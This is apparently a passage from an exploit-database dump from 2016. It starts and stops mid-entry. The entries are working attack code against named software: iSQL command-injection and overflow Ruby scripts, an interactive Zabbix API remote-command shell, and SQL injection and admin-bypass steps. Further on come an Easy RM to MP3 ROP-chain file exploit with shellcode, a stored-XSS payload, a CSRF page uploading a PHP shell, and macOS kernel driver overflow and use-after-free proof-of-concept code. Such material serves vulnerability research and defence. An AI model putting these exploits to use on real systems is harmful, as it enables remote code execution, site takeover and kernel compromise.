0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
(gdb) x/s $rbp
0x4141414141414141: <error: Cannot access memory at address 0x4141414141414141>
### Registers
(gdb) i r
rax 0x4141414141414141 4702111234474983745
rbx 0x0 0
rcx 0x7ffff7b06480 140737348920448
rdx 0x0 0
rsi 0x60b610 6338064
rdi 0x5 5
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffe948 0x7fffffffe948
r8 0xffffffff 4294967295
r9 0x0
=end
puts "iSQL 1.0 - Buffer Overflow"
puts " - by hahwul"
puts " - Run BUG.."
buffer = "A"*800
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable
:: don't filtering special characters in str value
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
454 strcpy((char *)cmd+5+strlen(str)," | md5sum");
455 stream=popen(cmd,"r");
456 fread(buf,sizeof(char),32,stream);
457 // printf("%s\n",buf);
458 return buf;
459 }
### Vulnerability Triger
614 while (USER_NUM==-1){
615 printf(">username:");
616 scanf("%s",username);
617 printf(">password:");
618 scanf("%s",passwd);
619 md5=get_MD5(passwd);
### Vulnerability Run
>username:asdf;
>password:asdf;top;echo 1
(~) #> ps -aux | grep top
root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum
root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top
=end
### Attack command
#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql
### Ruby Code
puts "SQL 1.0 - Shell Command Injection"
puts "by hahwul"
if(ARGV.size != 1)
puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
puts " need ./isql in same directory"
exit()
else
puts "CMD :: "+ARGV[0]
puts "Run Injection.."
system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")
end
### Sample Output
=begin
#> ruby test.rb nc
# Exploit Title: iSQL 1.0 Shell Command Injection
by hahwul
CMD :: nc
Run Injection..
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username:>password:verify failure , try again !
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
>username:>password:verify failure , try again !
^Ctest.rb:10:in `system': Interrupt
from test.rb:10:in `<main>'
=end
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A
import requests
import json
import readline
ZABIX_ROOT = 'http://192.168.66.2' ### Zabbix IP-address
url = ZABIX_ROOT + '/api_jsonrpc.php' ### Don't edit
login = 'Admin' ### Zabbix login
password = 'zabbix' ### Zabbix password
hostid = '10084' ### Zabbix hostid
### auth
payload = {
"jsonrpc" : "2.0",
"method" : "user.login",
"params": {
'user': ""+login+"",
'password': ""+password+"",
},
"auth" : None,
"id" : 0,
}
headers = {
'content-type': 'application/json',
}
auth = requests.post(url, data=json.dumps(payload), headers=(headers))
auth = auth.json()
while True:
cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
if cmd == "" : print "Result of last command:"
if cmd == "quit" : break
### update
payload = {
"jsonrpc": "2.0",
"method": "script.update",
"params": {
"scriptid": "1",
"command": ""+cmd+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_upd = requests.post(url, data=json.dumps(payload), headers=(headers))
### execute
payload = {
"jsonrpc": "2.0",
"method": "script.execute",
"params": {
"scriptid": "1",
"hostid": ""+hostid+""
},
"auth" : auth['result'],
"id" : 0,
}
cmd_exe = requests.post(url, data=json.dumps(payload), headers=(headers))
cmd_exe = cmd_exe.json()
print cmd_exe["result"]["value"]
######################
# Exploit Title : Joomla com_payplans - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/payplans
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.3.6
# Date: 2016/06/08
######################
#
# PoC:
# group_id Parameter Vulnerable To SQL
# Demo :
# http://server/index.php?option=com_payplans&group_id=4%27
# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
######################
# Discovered by : Mojtaba MobhaM
# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
<!--
# Exploit Title: Grid Gallery 1.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
--!>
=======================================================================================================
Grid Gallery 1.0 Admin panel Authentication bypass
Description : An Attackers are able to completely compromise the web application built upon
Grid Gallery as they can gain access to the admin panel and
manage the website as an admin without prior authentication!
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including content change,add admin user .. etc
=======================================================================================================
potential fix
<?php
session_start();
if (!isset($_SESSION["auth"])) {
exit(header('Location: admin/login.php'));
}
?>
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
<!--
# Exploit Title: Dream Gallery 2.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
--!>
=======================================================================================================
Dream Gallery 2.0 Admin panel Authentication bypass
Description : An Attackers are able to completely compromise the web application built upon
Dream Gallery as they can gain access to the admin panel and
manage the website as an admin without prior authentication!
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including content change,add admin user .. etc
=======================================================================================================
potential fix
<?php
session_start();
if (!isset($_SESSION["auth"])) {
exit(header('Location: admin/login.php'));
}
?>
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
# Exploit Title: FRticket - Ticket System - Stored XSS
# Google Dork: [if applicable]
# Date: 11.06.2016
# Exploit Author: Hamit ABİŞ
# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
# Version: v1
#########################################################################################################
About
Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins
Features:
- Admin Panel Dashboard
- Email Templates
- Agent Assignment
- Status Management
- Priority Management
- Categories Management
- And More Coming Soon…
#########################################################################################################
##########################################################################################################
Proof of Concept - Stored Ticket Title
POST /ticket/public/ticket HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Connection: keep-alive
_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments
##########################################################################################################
Twitter: https://twitter.com/sar1nz
<!--
# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
# Date : 2016/06/12
# Google Dork : Script-Kiddie ;)
# Exploit Author : Ali Ghanbari
# Vendor Homepage : http://www.viart.com/
# Software Link : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
# Version : 5.0
#POC
-->
<html>
<body onload="submitRequest();">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
xhr.withCredentials = "true";
var body = "-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"dir_root\"\r\n" +
"\r\n" +
"../images\r\n" +
"-----------------------------256672629917035\r\n" +
"Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------256672629917035--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
<!--
#Desc:
upload exploit code in your host and send link to admin when admin click on link, you can
access to your shell from below path :
http://localhost/images/[your shell]
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=724
nvAPIClient::Escape is the sole external method of nvAcclerator userclient type 0x2a0.
It implements its own method and parameter demuxing using the struct-in struct-out
buffers.
The second dword in the struct in buffer is another method identifier used in a switch
statement in ::Escape to choose the method to call. Method 24 is ::SetClocksShmoo.
On entry to this method rsi points to a buffer in kernel space with completely
user-controlled contents.
The uint16_t field at +0xc is used a loop count for the memory copying loop at
+0xff3e with insufficient bounds checking. The destination stack buffer is 0x520 bytes below the saved
frame pointer but the code only checks whether the value we provide (after bit shifting)
is greater than 0xff. Since each iteration of the loop writes 0x14 bytes we can actually
write up to 0x13ec bytes which is well over the size of the stack buffer which is being copied
into.
This bug is reachable from the safari renderer sandbox and the chrome gpu process sandbox
on device with the appropriate hardware (eg macbookpro)
*/
// ianbeer
// build: clang -o nv_shmoo nv_shmoo.c -framework IOKit
// tested on MacBookPro 10,1 w/10.11.3 (15D21)
/*
OS X kernel stack buffer overflow in GeForce gpu driver
nvAPIClient::Escape is the sole external method of nvAcclerator userclient type 0x2a0.
It implements its own method and parameter demuxing using the struct-in struct-out
buffers.
The second dword in the struct in buffer is another method identified used in a switch
statement in ::Escape to choose the method to call. Method 24 is ::SetClocksShmoo.
On entry to this method rsi points to a buffer in kernel space with completely
user-controlled contents.
The uint16_t field at +0xc is used a loop count for the memory copying loop at
+0xff3e with insufficient bounds checking. The destination stack buffer is 0x520 bytes below the saved
frame pointer but the code only checks whether the value we provide (after bit shifting)
is greater than 0xff. Since each iteration of the loop writes 0x14 bytes we can actually
write up to 0x13ec bytes which is well over the size of the stack buffer which is being copied
into.
This bug is reachable from the safari renderer sandbox and the chrome gpu process sandbox
on device with the appropriate hardware (eg macbookpro)
*/
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
uint64_t release_device_texture(mach_port_t conn) {
kern_return_t err;
uint64_t inputScalar[16];
uint64_t inputScalarCnt = 0;
char inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16];
uint32_t outputScalarCnt = 0;
char outputStruct[4096];
size_t outputStructCnt = 0;
inputStructCnt = 4096;
memset(inputStruct, 'A', inputStructCnt);
*((uint32_t*)(inputStruct+0x0)) = 1;
*((uint32_t*)(inputStruct+0x4)) = 24; // ::setShmoo
*((uint16_t*)(inputStruct+0xc)) = 0x1fe;
outputStructCnt = 4096;
err = IOConnectCallMethod(
conn,
0x0,
inputScalar,
inputScalarCnt,
inputStruct,
inputStructCnt,
outputScalar,
&outputScalarCnt,
outputStruct,
&outputStructCnt);
if (err != KERN_SUCCESS){
printf("IOConnectCall error: %x\n", err);
} else{
printf("worked?\n");
}
return 0;
}
mach_port_t get_user_client(char* name, int type) {
kern_return_t err;
CFMutableDictionaryRef matching = IOServiceMatching(name);
if(!matching){
printf("unable to create service matching dictionary\n");
return 0;
}
io_iterator_t iterator;
err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
if (err != KERN_SUCCESS){
printf("no matches\n");
return 0;
}
io_service_t service = IOIteratorNext(iterator);
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("unable to get user client connection\n");
return 0;
}
printf("got userclient connection: %x\n", conn);
return conn;
}
int main(int argc, char** argv){
mach_port_t gl_context = get_user_client("IOAccelerator", 0x2a0);
release_device_texture(gl_context);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=772
In IOAccelContext2::clientMemoryForType the lock_busy/unlock_busy should be extended to cover all the code
setting up shared memory type 2.
At the moment the lock doesn't protect two threads racing where one reaches
the release at +0x56AD (outside the lock) while the other is still using those raw pages via the raw pointer at
IOAccelContext+0x610 inside the locked region.
Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/
// ianbeer
// clang -o ioaccel_mem_uaf ioaccel_mem_uaf.c -framework IOKit -framework CoreFoundation -lpthread
/*
OS X kernel use-after-free due to bad locking in IOAcceleratorFamily2
In IOAccelContext2::clientMemoryForType the lock_busy/unlock_busy should be extended to cover all the code
setting up shared memory type 2.
At the moment the lock doesn't protect two threads racing where one reaches
the release at +0x56AD (outside the lock) while the other is still using those raw pages via the raw pointer at
IOAccelContext+0x610 inside the locked region.
Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/
#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>
#include <libkern/OSAtomic.h>
#include <mach/mach_error.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
io_connect_t get_user_client(const char* name, int type) {
kern_return_t err;
CFDictionaryRef matching;
io_service_t service;
// try IOServiceMatching
matching = IOServiceMatching(name);
service = IOServiceGetMatchingService(kIOMasterPortDefault, matching); // consume a ref on matching
if (service == MACH_PORT_NULL) {
// try IOServiceNameMatching
matching = IOServiceNameMatching(name);
service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
}
if (service == MACH_PORT_NULL) {
// try everything and look for a partial name match
matching = IOServiceMatching("IOService");
io_iterator_t iterator;
IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
int found_it = 0;
while ((service = IOIteratorNext(iterator)) != IO_OBJECT_NULL) {
io_name_t object_name;
IOObjectGetClass(service, object_name);
if (strstr(object_name, name)) {
found_it = 1;
break;
}
IOObjectRelease(service);
}
IOObjectRelease(iterator);
if (!found_it) {
// couldn't find any matches for the name anywhere
return MACH_PORT_NULL;
}
}
io_connect_t conn = MACH_PORT_NULL;
err = IOServiceOpen(service, mach_task_self(), type, &conn);
if (err != KERN_SUCCESS){
printf("IOServiceOpen failed: %s\n", mach_error_string(err));
IOObjectRelease(service);
return MACH_PORT_NULL;
}
IOObjectRelease(service);
return conn;
}
kern_return_t ioconnect_map(io_connect_t conn, int type) {
mach_vm_address_t addr = 0;
mach_vm_size_t size = 0x1000;
return IOConnectMapMemory64(
conn,
type,
mach_task_self(),
&addr,
&size,
kIOMapAnywhere
);
}
kern_return_t ioconnect_unmap(io_connect_t conn, int type) {
mach_vm_address_t addr = 0;
mach_vm_size_t size = 0x1000;
return IOConnectUnmapMemory64(
conn,
type,
mach_task_self(),
addr
);
}
io_connect_t client = MACH_PORT_NULL;
void* poc(void* arg) {
for (int i = 0 ; i < 1000; i++) {
ioconnect_map(client, 2);
}
return NULL;
}
int main(int argc, char** argv){
for(;;){
client = get_user_client("IntelAccelerator", 2);
pthread_t t;
pthread_create(&t, NULL, poc, NULL);
poc(NULL);
pthread_join(t, NULL);
IOServiceClose(client);
}
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=732
This is perhaps a more interesting UaF than just racing testNetBootMethod calls as there looks to be a path to getting free'd memory disclosed back to userspace.
Although the copyProperty macro used by is_io_registry_entry_get_property_bin takes the entry's properties lock before reading and
taking a reference on the property the testNetBootMethod external method directly calls the overriden setProperty without
taking that same lock. ::setProperty calls ::release on all the properties before nulling them out then replacing them
with new objects - we can get a UAF if we can get that ::release call to happen before the ::retain in copyProperty.
This PoC will crash as a UaF but with more care I believe you could get the OSSerialize to serialize an invalid object
leading to a nice kernel memory disclosure.
Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2
*/
//ianbeer
//build: clang -o hdix_race_get_set hdix_race_get_set.c -framework IOKit -framework Foundation -lpthread
/*
OS X/iOS kernel UAF racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient
This is perhaps a more interesting UaF than just racing testNetBootMethod calls as there looks to be a path to getting free'd memory disclosed back to userspace.
Although the copyProperty macro used by is_io_registry_entry_get_property_bin takes the entry's properties lock before reading and
taking a reference on the property the testNetBootMethod external method directly calls the overriden setProperty without
taking that same lock. ::setProperty calls ::release on all the properties before nulling them out then replacing them
with new objects - we can get a UAF if we can get that ::release call to happen before the ::retain in copyProperty.
This PoC will crash as a UaF but with more care I believe you could get the OSSerialize to serialize an invalid object
leading to a nice kernel memory disclosure.
Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <IOKit/IOKitLib.h>
#include <libkern/OSAtomic.h>
#include <mach/thread_act.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
#include <CoreFoundation/CoreFoundation.h>
unsigned int selector = 0;
uint64_t inputScalar[16];
size_t inputScalarCnt = 0;
uint8_t inputStruct[4096];
size_t inputStructCnt = 0;
uint64_t outputScalar[16] = {0};
uint32_t outputScalarCnt = 0;
char outputStruct[4096] = {0};
size_t outputStructCnt = 0;
io_connect_t global_conn = MACH_PORT_NULL;
void set_params(io_connect_t conn){
char* payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
